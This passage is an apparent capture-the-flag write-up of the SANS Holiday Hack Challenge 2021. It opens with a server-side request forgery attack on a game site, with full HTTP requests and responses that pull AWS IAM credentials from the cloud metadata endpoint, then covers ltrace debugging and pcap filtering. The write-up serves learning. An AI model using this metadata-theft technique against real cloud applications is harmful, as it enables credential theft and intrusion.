&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://apply.jackfrosttower.com/?inputName=useless&amp;amp;inputEmail=nunya%40business.com&amp;amp;inputPhone=0&amp;amp;inputField=Aggravated+pulling+of+hair&amp;amp;resumeFile=&amp;amp;inputWorkSample=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials&amp;amp;additionalInformation=&amp;amp;submit=&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Dest&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;image&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Mode&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;no-cors&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Site&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;same-origin&lt;/span&gt;
&lt;span class="na"&gt;Te&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trailers&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.16.1&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Wed, 29 Dec 2021 17:40:01 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;image/jpeg&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;14&lt;/span&gt;
&lt;span class="na"&gt;Last-Modified&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Wed, 29 Dec 2021 17:40:01 GMT&lt;/span&gt;
&lt;span class="na"&gt;Etag&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;&amp;quot;61cc9d71-e&amp;quot;&lt;/span&gt;
&lt;span class="na"&gt;Expires&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mon, 03 Jan 2022 17:40:01 GMT&lt;/span&gt;
&lt;span class="na"&gt;Cache-Control&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;max-age=432000&lt;/span&gt;
&lt;span class="na"&gt;Accept-Ranges&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;bytes&lt;/span&gt;
&lt;span class="na"&gt;Via&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1.1 google&lt;/span&gt;
&lt;span class="na"&gt;Alt-Svc&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;clear&lt;/span&gt;

&lt;span class="hll"&gt;jf-deploy-role
&lt;/span&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The webapp tried to create an image with our name, with the content of the
URL we gave it. In that case, the IMDS URL to get the role name, which seems
to be &lt;code&gt;jf-deploy-role&lt;/code&gt;. We got our role name, which means we can now
get the secret access key, using this URL:
&lt;a class="reference external" href="http://169.254.169.254/latest/meta-data/iam/security-credentials/jf-deploy-role"&gt;http://169.254.169.254/latest/meta-data/iam/security-credentials/jf-deploy-role&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Let's send out another form with this URL, and download the generated &amp;quot;image&amp;quot;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="nf"&gt;GET&lt;/span&gt; &lt;span class="nn"&gt;/images/useless2.jpg&lt;/span&gt; &lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt;
&lt;span class="na"&gt;Host&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;apply.jackfrosttower.com&lt;/span&gt;
&lt;span class="na"&gt;User-Agent&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:95.0) Gecko/20100101 Firefox/95.0&lt;/span&gt;
&lt;span class="na"&gt;Accept&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;image/avif,image/webp,*/*&lt;/span&gt;
&lt;span class="na"&gt;Accept-Language&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;fr,fr-FR;q=0.8,en-US;q=0.5,en;q=0.3&lt;/span&gt;
&lt;span class="na"&gt;Accept-Encoding&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;gzip, deflate&lt;/span&gt;
&lt;span class="na"&gt;Referer&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;https://apply.jackfrosttower.com/?inputName=useless2&amp;amp;inputEmail=nunya%40business.com&amp;amp;inputPhone=0&amp;amp;inputField=Aggravated+pulling+of+hair&amp;amp;resumeFile=&amp;amp;inputWorkSample=http%3A%2F%2F169.254.169.254%2Flatest%2Fmeta-data%2Fiam%2Fsecurity-credentials%2Fjf-deploy-role&amp;amp;additionalInformation=&amp;amp;submit=&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Dest&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;image&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Mode&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;no-cors&lt;/span&gt;
&lt;span class="na"&gt;Sec-Fetch-Site&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;same-origin&lt;/span&gt;
&lt;span class="na"&gt;Te&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;trailers&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kr"&gt;HTTP&lt;/span&gt;&lt;span class="o"&gt;/&lt;/span&gt;&lt;span class="m"&gt;1.1&lt;/span&gt; &lt;span class="m"&gt;200&lt;/span&gt; &lt;span class="ne"&gt;OK&lt;/span&gt;
&lt;span class="na"&gt;Server&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;nginx/1.16.1&lt;/span&gt;
&lt;span class="na"&gt;Date&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Wed, 29 Dec 2021 17:45:23 GMT&lt;/span&gt;
&lt;span class="na"&gt;Content-Type&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;image/jpeg&lt;/span&gt;
&lt;span class="na"&gt;Content-Length&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;308&lt;/span&gt;
&lt;span class="na"&gt;Last-Modified&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Wed, 29 Dec 2021 17:45:23 GMT&lt;/span&gt;
&lt;span class="na"&gt;Etag&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;&amp;quot;61cc9eb3-134&amp;quot;&lt;/span&gt;
&lt;span class="na"&gt;Expires&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;Mon, 03 Jan 2022 17:45:23 GMT&lt;/span&gt;
&lt;span class="na"&gt;Cache-Control&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;max-age=432000&lt;/span&gt;
&lt;span class="na"&gt;Accept-Ranges&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;bytes&lt;/span&gt;
&lt;span class="na"&gt;Via&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;1.1 google&lt;/span&gt;
&lt;span class="na"&gt;Alt-Svc&lt;/span&gt;&lt;span class="o"&gt;:&lt;/span&gt; &lt;span class="l"&gt;clear&lt;/span&gt;

{
    &amp;quot;Code&amp;quot;: &amp;quot;Success&amp;quot;,
    &amp;quot;LastUpdated&amp;quot;: &amp;quot;2021-05-02T18:50:40Z&amp;quot;,
    &amp;quot;Type&amp;quot;: &amp;quot;AWS-HMAC&amp;quot;,
    &amp;quot;AccessKeyId&amp;quot;: &amp;quot;AKIA5HMBSK1SYXYTOXX6&amp;quot;,
&lt;span class="hll"&gt;    &amp;quot;SecretAccessKey&amp;quot;: &amp;quot;CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX&amp;quot;,
&lt;/span&gt;    &amp;quot;Token&amp;quot;: &amp;quot;NR9Sz/7fzxwIgv7URgHRAckJK0JKbXoNBcy032XeVPqP8/tWiR/KVSdK8FTPfZWbxQ==&amp;quot;,
    &amp;quot;Expiration&amp;quot;: &amp;quot;2026-05-02T18:50:40Z&amp;quot;
}
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Alright, we got our secret access key, &lt;code&gt;CGgQcSdERePvGgr058r3PObPq3+0CfraKcsLREpX&lt;/code&gt;!&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-11"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id52"&gt;Objective 11:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="tinsel-upatree-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id53"&gt;Tinsel Upatree's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Tinsel Upatree needs help restarting the cotton candy machine. There is an
executable, called &lt;code&gt;make_the_candy&lt;/code&gt;, but if we launch it, we only
get an error:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;kotton_kandy_co@1c9754cf5e81:~$&lt;/span&gt; ./make_the_candy
&lt;span class="go"&gt;Unable to open configuration file.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The challenge is called &amp;quot;Strace ltrace&amp;quot;, in reference to the two programs
called &lt;code&gt;strace&lt;/code&gt; (which traces system calls) and &lt;code&gt;ltrace&lt;/code&gt; (which
traces library calls).&lt;/p&gt;
&lt;p&gt;Let's try running &lt;code&gt;make_the_candy&lt;/code&gt; with &lt;code&gt;ltrace&lt;/code&gt;:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;kotton_kandy_co@1c9754cf5e81:~$&lt;/span&gt; ltrace ./make_the_candy
&lt;span class="hll"&gt;&lt;span class="go"&gt;fopen(&amp;quot;registration.json&amp;quot;, &amp;quot;r&amp;quot;)                           = 0&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;puts(&amp;quot;Unable to open configuration fil&amp;quot;...Unable to open configuration file.&lt;/span&gt;
&lt;span class="go"&gt;)               = 35&lt;/span&gt;
&lt;span class="go"&gt;+++ exited (status 1) +++&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Apparently, the program tries to open a file called &lt;code&gt;registration.json&lt;/code&gt;,
and since no such file exists, it exits with the previous error message.&lt;/p&gt;
&lt;p&gt;Let's create an empty file with the proper name to see what happens:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;kotton_kandy_co@1c9754cf5e81:~$&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; &amp;gt; registration.json
&lt;span class="gp"&gt;kotton_kandy_co@1c9754cf5e81:~$&lt;/span&gt; ltrace ./make_the_candy
&lt;span class="go"&gt;fopen(&amp;quot;registration.json&amp;quot;, &amp;quot;r&amp;quot;)                           = 0x561fddf07260&lt;/span&gt;
&lt;span class="go"&gt;getline(0x7fff4cc17940, 0x7fff4cc17948, 0x561fddf07260, 0x7fff4cc17948) = 1&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;strstr(&amp;quot;\n&amp;quot;, &amp;quot;Registration&amp;quot;)                              = nil&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;getline(0x7fff4cc17940, 0x7fff4cc17948, 0x561fddf07260, 0x7fff4cc17948) = -1&lt;/span&gt;
&lt;span class="go"&gt;puts(&amp;quot;Unregistered - Exiting.&amp;quot;Unregistered - Exiting.&lt;/span&gt;
&lt;span class="go"&gt;)                           = 24&lt;/span&gt;
&lt;span class="go"&gt;+++ exited (status 1) +++&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now it seems to be searching for the string &lt;code&gt;Registration&lt;/code&gt;. Let's add it
to our file:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;kotton_kandy_co@1c9754cf5e81:~$&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; Registration &amp;gt; registration.json
&lt;span class="gp"&gt;kotton_kandy_co@1c9754cf5e81:~$&lt;/span&gt; ltrace ./make_the_candy
&lt;span class="go"&gt;fopen(&amp;quot;registration.json&amp;quot;, &amp;quot;r&amp;quot;)                           = 0x55bd9eaf8260&lt;/span&gt;
&lt;span class="go"&gt;getline(0x7ffef26245b0, 0x7ffef26245b8, 0x55bd9eaf8260, 0x7ffef26245b8) = 13&lt;/span&gt;
&lt;span class="go"&gt;strstr(&amp;quot;Registration\n&amp;quot;, &amp;quot;Registration&amp;quot;)                  = &amp;quot;Registration\n&amp;quot;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;strchr(&amp;quot;Registration\n&amp;quot;, &amp;#39;:&amp;#39;)                             = nil&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;getline(0x7ffef26245b0, 0x7ffef26245b8, 0x55bd9eaf8260, 0x7ffef26245b8) = -1&lt;/span&gt;
&lt;span class="go"&gt;puts(&amp;quot;Unregistered - Exiting.&amp;quot;Unregistered - Exiting.&lt;/span&gt;
&lt;span class="go"&gt;)                           = 24&lt;/span&gt;
&lt;span class="go"&gt;+++ exited (status 1) +++&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now it seems to be searching for the character &lt;code&gt;:&lt;/code&gt;. So let's add it as
well:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;kotton_kandy_co@1c9754cf5e81:~$&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; Registration: &amp;gt; registration.json
&lt;span class="gp"&gt;kotton_kandy_co@1c9754cf5e81:~$&lt;/span&gt; ltrace ./make_the_candy
&lt;span class="go"&gt;fopen(&amp;quot;registration.json&amp;quot;, &amp;quot;r&amp;quot;)                           = 0x561922134260&lt;/span&gt;
&lt;span class="go"&gt;getline(0x7ffde0d995f0, 0x7ffde0d995f8, 0x561922134260, 0x7ffde0d995f8) = 14&lt;/span&gt;
&lt;span class="go"&gt;strstr(&amp;quot;Registration:\n&amp;quot;, &amp;quot;Registration&amp;quot;)                 = &amp;quot;Registration:\n&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;strchr(&amp;quot;Registration:\n&amp;quot;, &amp;#39;:&amp;#39;)                            = &amp;quot;:\n&amp;quot;&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;strstr(&amp;quot;:\n&amp;quot;, &amp;quot;True&amp;quot;)                                     = nil&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;getline(0x7ffde0d995f0, 0x7ffde0d995f8, 0x561922134260, 0x7ffde0d995f8) = -1&lt;/span&gt;
&lt;span class="go"&gt;puts(&amp;quot;Unregistered - Exiting.&amp;quot;Unregistered - Exiting.&lt;/span&gt;
&lt;span class="go"&gt;)                           = 24&lt;/span&gt;
&lt;span class="go"&gt;+++ exited (status 1) +++&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Now it's looking for &lt;code&gt;True&lt;/code&gt;, so let's add it (I can do this all day!):&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;kotton_kandy_co@1c9754cf5e81:~$&lt;/span&gt; &lt;span class="nb"&gt;echo&lt;/span&gt; Registration:True &amp;gt; registration.json
&lt;span class="gp"&gt;kotton_kandy_co@1c9754cf5e81:~$&lt;/span&gt; ltrace ./make_the_candy
&lt;span class="go"&gt;fopen(&amp;quot;registration.json&amp;quot;, &amp;quot;r&amp;quot;)                           = 0x555b0cfe6260&lt;/span&gt;
&lt;span class="go"&gt;getline(0x7ffd2917d140, 0x7ffd2917d148, 0x555b0cfe6260, 0x7ffd2917d148) = 18&lt;/span&gt;
&lt;span class="go"&gt;strstr(&amp;quot;Registration:True\n&amp;quot;, &amp;quot;Registration&amp;quot;)             = &amp;quot;Registration:True\n&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;strchr(&amp;quot;Registration:True\n&amp;quot;, &amp;#39;:&amp;#39;)                        = &amp;quot;:True\n&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;strstr(&amp;quot;:True\n&amp;quot;, &amp;quot;True&amp;quot;)                                 = &amp;quot;True\n&amp;quot;&lt;/span&gt;
&lt;span class="go"&gt;getline(0x7ffd2917d140, 0x7ffd2917d148, 0x555b0cfe6260, 0x7ffd2917d148) = -1&lt;/span&gt;
&lt;span class="go"&gt;system(&amp;quot;/bin/initialize_cotton_candy_sys&amp;quot;...&lt;/span&gt;


&lt;span class="go"&gt;Launching...&lt;/span&gt;
&lt;span class="go"&gt;[snip]&lt;/span&gt;
&lt;span class="go"&gt;Candy making in progress&lt;/span&gt;

&lt;span class="go"&gt; &amp;lt;no return ...&amp;gt;&lt;/span&gt;
&lt;span class="go"&gt;--- SIGCHLD (Child exited) ---&lt;/span&gt;
&lt;span class="go"&gt;&amp;lt;... system resumed&amp;gt; )                                    = 0&lt;/span&gt;
&lt;span class="go"&gt;fclose(0x555b0cfe6260)                                    = 0&lt;/span&gt;
&lt;span class="go"&gt;+++ exited (status 0) +++&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;We managed to launch the cotton candy machine!&lt;/p&gt;
&lt;/div&gt;
&lt;div class="section" id="customer-complaint-analysis"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id54"&gt;Customer Complaint Analysis&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Apparently, a human accessed the Jack Frost Tower network with a non-compliant
host. Here's troll Pat Tronizer explaining the situation to us:&lt;/p&gt;
&lt;img alt="Pat Tronizer. They're a troll wearing a red Christmas jumper, blue pants, black shoes, a blue beanie, red fake antlers and a red nose." class="align-center" src="/images/sans-christmas-challenge-2021/pattronizer.png" /&gt;
&lt;p&gt;&lt;em&gt;Pat Tronizer says&lt;/em&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Hrmph. Oh hey, I'm Pat Tronizer.&lt;/p&gt;
&lt;p&gt;I'm SO glad to have all these first-rate talks here.&lt;/p&gt;
&lt;p&gt;We issued a Call for Talks, but only one person responded… We put him in
track 1.&lt;/p&gt;
&lt;p&gt;But Jack came up with an ingenious way to borrow additional talks for
FrostFest! You can hardly tell where we got these great speakers!&lt;/p&gt;
&lt;p&gt;Anyway, I cannot believe an actual human &lt;a class="reference external" href="/docs/sans-christmas-challenge-2021/jackfrosttower-network.pcap"&gt;connected to the Tower network&lt;/a&gt;.
It’s supposed to be the domain of us trolls and of course Jack Frost himself.&lt;/p&gt;
&lt;p&gt;Mr. Frost has a strict policy: all devices must be &lt;a class="reference external" href="https://datatracker.ietf.org/doc/html/rfc3514"&gt;RFC3514&lt;/a&gt;
compliant. It fits in with our nefarious plans.&lt;/p&gt;
&lt;p&gt;Some human had the nerve to use our complaint website to submit a
complaint!&lt;/p&gt;
&lt;p&gt;That website is for trolls to complain about guests, NOT the other way
around.&lt;/p&gt;
&lt;p&gt;Humans have some nerve.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Alright, apart from admitting that FrostFest just copies the talks from
KringleCon, we learn that all trolls use RFC3514-compliant devices. This RFC
is an April Fools RFC, introducing the so-called &amp;quot;evil bit&amp;quot; in the IPv4 header.
Nefarious packets will have the evil bit set to 1. Innocuous packets will have
this bit set to 0. So, which bit is it? Let's simply read the RFC:&lt;/p&gt;
&lt;blockquote&gt;
The high-order bit of the IP fragment offset field is the only unused bit
in the IP header.&lt;/blockquote&gt;
&lt;p&gt;The evil bit is therefore the most significant bit in the IP fragment flags.
Let's take a look at the network capture in Wireshark:&lt;/p&gt;
&lt;img alt="The detail of the IPv4 header of the first frame of the network capture. We can see that the most-significant bit of the fragmentation flags is set to 1. The name of this bit in Wireshark, that can be used in filters, is ip.flags.rb." class="align-center" src="/images/sans-christmas-challenge-2021/wireshark_evil_bit.png" /&gt;
&lt;p&gt;We can see that the most-significant bit is set to 1, indicating evil purposes!
We can also see that the name of this bit, which we can use to create filters,
is &lt;code&gt;ip.flags.rb&lt;/code&gt; (where &lt;code&gt;rb&lt;/code&gt; stands for reserved bit).&lt;/p&gt;
&lt;p&gt;Alright, let's find our human in the traffic, using &lt;code&gt;tshark&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Now, a human would most likely have this bit set to 0, since it's the default
value. So let's filter using that: &lt;code&gt;ip.flags.rb == 0&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;In the network capture, we can also see a bunch of HTTP traffic, so let's
extract this also: &lt;code&gt;-T fields -e http.file_data&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Here's our final command, with some prettyfying done at the end:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; tshark -r jackfrosttower-network.pcap -T fields -e http.file_data &lt;span class="s2"&gt;&amp;quot;ip.flags.rb == 0&amp;quot;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; tr &lt;span class="s1"&gt;&amp;#39;+&amp;amp;&amp;#39;&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39; \n&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; sort -u

&lt;span class="go"&gt;description=I have never%2C in my life%2C been in a facility with such a horrible staff. They are rude and insulting. What kind of place is this%3F You can be sure that I %28or my lawyer%29 will be speaking directly with Mr. Frost%21&lt;/span&gt;
&lt;span class="hll"&gt;&lt;span class="go"&gt;guest_info=Room 1024&lt;/span&gt;
&lt;/span&gt;&lt;span class="go"&gt;name=Muffy VonDuchess Sebastian&lt;/span&gt;
&lt;span class="go"&gt;submit=Submit&lt;/span&gt;
&lt;span class="go"&gt;troll_id=I don%27t know. There were several of them.&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Sounds like the human is Muffy VonDuchess Sebastian, who is staying in room
1024. We can use this to build our filter to find the trolls who complained
about Ms. Sebastian.&lt;/p&gt;
&lt;p&gt;This time, we want the evil bit set to 1. We also want the value posted to the
complaint website to contains Ms. Sebastian's room number. This gives us the
following filter: &lt;code&gt;ip.flags.rb == 1 &amp;amp;&amp;amp; urlencoded-form.value contains &amp;quot;1024&amp;quot;&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;Now, the name of the troll doing the complaint seems to be stored in a
parameter called &lt;code&gt;name&lt;/code&gt;, so will filter our output using &lt;code&gt;grep name&lt;/code&gt;.
We'll then use &lt;code&gt;cut&lt;/code&gt; to get just the names. We'll then &lt;code&gt;sort&lt;/code&gt; them
so they're in alphabetical order, and use &lt;code&gt;paste&lt;/code&gt; to get them on just
one line:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="gp"&gt;$&lt;/span&gt; tshark -r jackfrosttower-network.pcap -T fields -e http.file_data &lt;span class="s1"&gt;&amp;#39;ip.flags.rb == 1 &amp;amp;&amp;amp; urlencoded-form.value contains &amp;quot;1024&amp;quot;&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; tr &lt;span class="s1"&gt;&amp;#39;+&amp;amp;&amp;#39;&lt;/span&gt; &lt;span class="s1"&gt;&amp;#39; \n&amp;#39;&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; grep name &lt;span class="p"&gt;|&lt;/span&gt; cut -d &lt;span class="s1"&gt;&amp;#39;=&amp;#39;&lt;/span&gt; -f &lt;span class="m"&gt;2&lt;/span&gt; &lt;span class="p"&gt;|&lt;/span&gt; sort &lt;span class="p"&gt;|&lt;/span&gt; paste -s -d&lt;span class="s1"&gt;&amp;#39; &amp;#39;&lt;/span&gt;
&lt;span class="go"&gt;Flud Hagg Yaqh&lt;/span&gt;
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The trolls are called &lt;code&gt;Flud&lt;/code&gt;, &lt;code&gt;Hagg&lt;/code&gt;, and &lt;code&gt;Yaqh&lt;/code&gt;.&lt;/p&gt;
&lt;/div&gt;
&lt;/div&gt;
&lt;div class="section" id="objective-12"&gt;
&lt;h2&gt;&lt;a class="toc-backref" href="#id55"&gt;Objective 12:&lt;/a&gt;&lt;/h2&gt;
&lt;div class="section" id="ribb-bonbowford-s-cranberry-pi-challenge"&gt;
&lt;h3&gt;&lt;a class="toc-backref" href="#id56"&gt;Ribb Bonbowford's Cranberry Pi Challenge&lt;/a&gt;&lt;/h3&gt;
&lt;p&gt;Ribb Bonbowford wants our help to solve &lt;a class="reference external" href="https://elfcode21.kringlecastle.com/"&gt;this coding challenge&lt;/a&gt;. Basically, we can use Python 3
to move an elf around. They must collect every lollipop before entering the
castle. There are several other elements:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;Obstacles: these are just barrels standing in the way, your elf can't get
past them.&lt;/li&gt;
&lt;li&gt;Yeeters: these are some kind of big springs that will yeet your elf off the
map.&lt;/li&gt;
&lt;li&gt;Pits: they are holes in the ground that your elf can fall into.&lt;/li&gt;
&lt;li&gt;Levers: you can activate them to disable yeeters or pits.&lt;/li&gt;
&lt;li&gt;Munchkins: they are natural enemies to elves. However, if your elf can answer
their question correctly, they will let them pass.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Level 0 is just a demo, so I'll skip it. Knowing all that, let's code!&lt;/p&gt;
&lt;div class="section" id="level-1"&gt;
&lt;h4&gt;&lt;a class="toc-backref" href="#id57"&gt;Level 1&lt;/a&gt;&lt;/h4&gt;
&lt;img alt="Elf Code Level 1. The elf only has to move left by 9 spaces and go to coordinates (2, 2) to enter the castle. There are no obstacles." class="align-center" src="/images/sans-christmas-challenge-2021/elf_code_level_1.png" /&gt;
&lt;p&gt;Alright, looks pretty simple. We can use &lt;code&gt;elf.moveTo&lt;/code&gt; to go to
coordinates (2, 2). According to the documentation, &lt;code&gt;elf.moveTo&lt;/code&gt; works
simply by moving the elf along the X axis, and then to the Y axis. Since the
map is empty, we can use it to get to the castle doors and pick the lollipop
on the way.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre&gt;&lt;span&gt;&lt;/span&gt;&lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="nn"&gt;elf&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;munchkins&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;levers&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;lollipops&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;yeeters&lt;/span&gt;&lt;span class="o"&gt;,&lt;/span&gt; &lt;span class="nn"&gt;pits&lt;/span&gt;
